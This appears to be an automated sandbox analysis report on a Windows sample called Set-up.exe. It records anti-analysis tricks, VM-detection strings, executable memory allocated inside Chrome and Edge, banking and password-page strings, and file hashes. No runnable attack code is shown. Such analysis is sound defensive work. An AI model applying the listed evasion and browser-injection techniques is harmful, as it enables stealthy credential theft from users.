Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Set-up.exe	API/Special instruction interceptor: Address: 7FF84F7AD304
Source: C:\Users\user\Desktop\Set-up.exe	API/Special instruction interceptor: Address: 7FF84F7AD744
Source: C:\Users\user\Desktop\Set-up.exe	API/Special instruction interceptor: Address: 7FF84F7B0154
Source: C:\Users\user\Desktop\Set-up.exe	API/Special instruction interceptor: Address: 7FF84F7ADA44

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.24224532.B64.2408191502,BiosReleaseDate:08/19/2024,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAMX
Source: Amcache.hve.7.dr	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dd-92 e8 86 9f a5 a6 64 93
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h

Source: C:\Users\user\Desktop\Set-up.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_0267143D RtlInitAnsiString,LdrGetProcedureAddress,

0_2_0267143D

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02685BC0 mov eax, dword ptr fs:[00000030h]	0_2_02685BC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D062F mov edx, dword ptr fs:[00000030h]	0_2_043D062F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D0BEF mov eax, dword ptr fs:[00000030h]	0_2_043D0BEF
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D123F mov eax, dword ptr fs:[00000030h]	0_2_043D123F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D123E mov eax, dword ptr fs:[00000030h]	0_2_043D123E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D1C2D mov eax, dword ptr fs:[00000030h]	0_2_043D1C2D
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D0F9F mov eax, dword ptr fs:[00000030h]	0_2_043D0F9F

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0240000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0250000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0260000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0270000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401C0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384170000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384180000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Memory allocated: C:\Program

ID:	1686587
Product:	CloudBasic
Start time:	08:04:18
Start date:	10.05.2025
Sample:	Set-up.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	b21f13cf1a28ffc443ca52a022c78c3d
SHA1:	7704084a3977b18d2ac687eef97bb3cb27e33ff2
SHA256:	6cd56f0b601722945ffc79d0a5468784fe9b1552fdd1931a64cd0f5608a7d697
Filetype:	Win32 Executable (generic) a (10002005/4) 99.83%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_6529d8499c11cd4f9e25b8c1dc6756637128dac_19d51899_09214adb-9fd0-44c0-a0e9-1d32bf30b89f\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	E7A709D5BCB7CB479C0FF6D515E80F03	524A8ED7292AE20FA150C81F8FC4977DB29BA278	DAF8676D4795111BFAAB9BCFCA2224126E7100FFDCC2504FCF857FCF3B0AA8ED
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_6529d8499c11cd4f9e25b8c1dc6756637128dac_19d51899_839c2440-3000-4f8a-b3ac-c02cf614e8a6\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	96FBB3ADFE4DD12DDCED6549595AC3EC	B15653634C3BE86D7CB31FAC5B8F47628CFE1FC4	FF9CF536867EF094656555429223BFC56B43F54F37C760ADC6FAB97F2544ACF2
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_6529d8499c11cd4f9e25b8c1dc6756637128dac_19d51899_9075c3c4-a6e6-45ed-ade9-137bd9ff37d2\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	40A934CE3B7721C7A6EB9B1C770D6CA0	71FF931D791DC30501E9557889D51AC2D8A6C339	D00CB52E089CD65AFA2A5951E8C6493EA0EF51ECA3AD12E73557F6C3904DA723
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_653df720363a23f9fbf1c3440f42767b874ec_19d51899_3be725a7-7bec-402d-912c-5b6e1b4103ce\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	E8762B61C2FF7AE8BB1A38A33982C73E	09DAE270E56B46216B1075A5D526207DBC9AD8C8	4FE95B7998D77553D367B3201067F121FF7E7BBA7312AAD11795C2F533E214CF
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_653df720363a23f9fbf1c3440f42767b874ec_19d51899_c2374def-a73f-4e01-95b4-340ccaa2b026\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	3AB705B0D0A607E5FBFDCD06F1AD2295	5CDA28540D347BA818E5CAF35A8A67C3FCF18E20	148DF1162609666289F9EF6227C0D35E8A9C25A492B2BD9D17EE94BB9E65AB1A
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_chrome.exe_653df720363a23f9fbf1c3440f42767b874ec_19d51899_d5b0c01f-b54c-461f-bcf0-11216f7d913a\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	9CF805539EA6B34E8A40AEA021AD33CC	4604A1BB379C019A60086D236A1611A4F3970C46	FFB13E6F49E1BC5230D58A3D81A2C7947E0B4801A2CDFD8BBE2B1EF40C949980
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msedge.exe_6e7a37746f818a347830ea1e976120e73daecf72_75709460_5165434c-287c-474f-a884-9d1a74be8407\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	51E9B024A3CC3CE22584300352D7C9D9	F7E03FC4399CBBC58688CA184CFB7FB8491982FF	97E52C7468124972F8273A8BFD319D0FF28BD025963B73311F3415CEAA33ABF7
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msedge.exe_6e7a37746f818a347830ea1e976120e73daecf72_75709460_b01ff826-0a9d-4c99-9877-b3edef4f4d6f\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	08E621BC80388AEBEFBB8D883D9C4ED6	231EB3BE938C481EEF5464320D7BFA1DA77EB243	14ACDF69D690294462F4B63F91487CF8120A7BEEA9AAA6275227E4CEA6EA7C7B
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msedge.exe_6e7a37746f818a347830ea1e976120e73daecf72_75709460_b102db5d-74bf-4bf9-9096-aa63fdbc572a\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	C4EDC7B79BD3B00C3E814C65DAEA2D91	1DF8C0AF43B957C58936A936B9579ED582D56245	D9AFC22A6D876A18FE1E91B90C769F52B1F2F2ABC22AA60047EFF3B8D04C7E9C
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msedge.exe_b2183e612ae09e2d847ad213d2fdf44b96d97240_75709460_6cc951a1-00ca-4995-8233-9f6060a8e2f7\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	7033358D18191330F567F1E01923C92C	F1A0ECC3CBB0E2F4E10C8034AEEF0633B42E30F3	F1F7FD6FF33C088CD25F3D73AEBCA295320E67854FF601E922F59DAF163100DE
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msedge.exe_b2183e612ae09e2d847ad213d2fdf44b96d97240_75709460_7e0abad9-a362-4765-a520-880ef44139fd\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	4CD5BCFC56218B3F8C526626D67D3369	779F52E85A34339EA6CAE6E8D7C8B1CB4B8E87B6	8897284FAC4892520A4A5B1A5BDD064460F16168118EBCCC6BEEF149A6EEA450
